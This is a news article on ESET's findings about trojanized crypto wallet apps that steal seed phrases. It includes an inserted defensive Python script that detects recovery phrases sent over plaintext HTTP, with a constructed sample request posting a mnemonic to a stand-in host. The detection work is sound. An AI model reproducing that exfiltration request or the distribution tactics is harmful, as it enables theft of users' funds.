Researchers have uncovered a malicious scheme, directed mainly at Chinese users, that uses fake Android and iOS apps resembling genuine digital wallet services to steal cryptocurrency funds.
“These malicious apps were able to steal victims’ secret seed phrases by impersonating Coinbase, imToken, MetaMask, Trust Wallet, Bitpie, TokenPocket, or OneKey,” said Lukáš Štefanko, senior malware researcher at ESET in a report shared with The Hacker News.
The operators have been using a network of over 40 counterfeit wallet websites, promoted through deceptive articles placed on legitimate Chinese websites. They also use intermediaries in Telegram and Facebook groups to trick unsuspecting visitors into downloading the malicious apps.
ESET has been tracking the attack since May 2021 and suggested that a single criminal group is behind the scheme. The trojanized cryptocurrency wallet apps are designed to mimic the functionalities of the original apps, and at the same time, they integrate malicious code changes that allow the theft of crypto assets.
“These malicious apps also represent another threat to victims, as some of them send secret victim seed phrases to the attackers’ server using an unsecured HTTP connection,” Štefanko said. “This means that victims’ funds could be stolen not only by the operator of this scheme but also by a different attacker eavesdropping on the same network.”
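As an added defender's illustration, not code from ESET's report or this article: a small Python heuristic that inspects a captured plaintext HTTP request and flags fields carrying what looks like a 12- to 24-word recovery phrase, the kind of check a network monitor could run precisely because the exfiltration described above is unencrypted. The hostname, field names and words in the sample request are constructed.

```python
import json
import re
from urllib.parse import parse_qs

# Valid BIP-39 mnemonic lengths. A full wordlist/checksum check is omitted here,
# so this is a heuristic for suspicious traffic, not a validation of the phrase.
MNEMONIC_LENGTHS = {12, 15, 18, 21, 24}
WORD_SEQ = re.compile(r"^[a-z]{3,8}(?: [a-z]{3,8}){11,23}$")
SUSPECT_FIELDS = ("mnemonic", "seed", "phrase", "words", "secret")

def looks_like_seed_phrase(value: str) -> bool:
    """Heuristic: 12-24 lowercase words of 3-8 letters separated by single spaces."""
    v = value.strip()
    return bool(WORD_SEQ.match(v)) and len(v.split()) in MNEMONIC_LENGTHS

def extract_fields(content_type: str, body: str) -> dict:
    """Decode a form-encoded or JSON request body into a flat {field: value} dict."""
    if "json" in content_type:
        try:
            data = json.loads(body)
        except ValueError:
            return {}
        return {k: str(v) for k, v in data.items()} if isinstance(data, dict) else {}
    return {k: v[0] for k, v in parse_qs(body).items()}

def find_seed_exfil(raw_request: str) -> list:
    """Parse one plaintext HTTP request; return a finding per field that carries a seed phrase."""
    head, _, body = raw_request.partition("\r\n\r\n")
    lines = head.split("\r\n")
    _, path = lines[0].split(" ")[:2]
    headers = {k.lower(): v for k, v in (l.split(": ", 1) for l in lines[1:] if ": " in l)}
    findings = []
    for field, value in extract_fields(headers.get("content-type", ""), body).items():
        if looks_like_seed_phrase(value):
            findings.append({"host": headers.get("host"), "path": path, "field": field,
                             "named_like_secret": any(s in field.lower() for s in SUSPECT_FIELDS)})
    return findings

# Constructed sample of what an on-path observer would see when a trojanized wallet
# posts the recovery phrase in the clear (hostname and words are made up).
SAMPLE_REQUEST = ("POST /api/wallet/import HTTP/1.1\r\nHost: wallet-update.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    "user=abc123&mnemonic=apple+river+cloud+stone+brave+tiger+ocean+piano+lemon+field+candy+dream")

if __name__ == "__main__":
    print(find_seed_exfil(SAMPLE_REQUEST))
```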
The Slovak cybersecurity firm is aware of dozens of groups promoting the fake wallet apps on Telegram and Facebook.
“Based on the information acquired from these groups, a person distributing this malware is offered a 50 per cent commission on the stolen contents of the wallet,” ESET noted.
The apps have a notable feature that lets them adapt to the operating environment. On Android, the attackers target users who have not installed any of the shortlisted wallet applications, while on iOS, targets can install both versions.
The fake iOS wallet apps are not available on the App Store; they can only be installed from one of the malicious websites via configuration profiles, which allow applications to be installed without verification by Apple.
The investigation also unearthed 13 rogue apps that masqueraded as the Jaxx Liberty Wallet on the Google Play Store, all of which have since been removed from the Android app marketplace as of January 2022. They were collectively installed more than 1,100 times.
“Their goal was simply to tease out the user’s recovery seed phrase and send it either to the attackers’ server or to a secret Telegram chat group,” Štefanko said.
“Moreover, it seems that the source code of this threat has been leaked and shared on a few Chinese websites, which might attract various threat actors and spread this threat even further,” Štefanko added.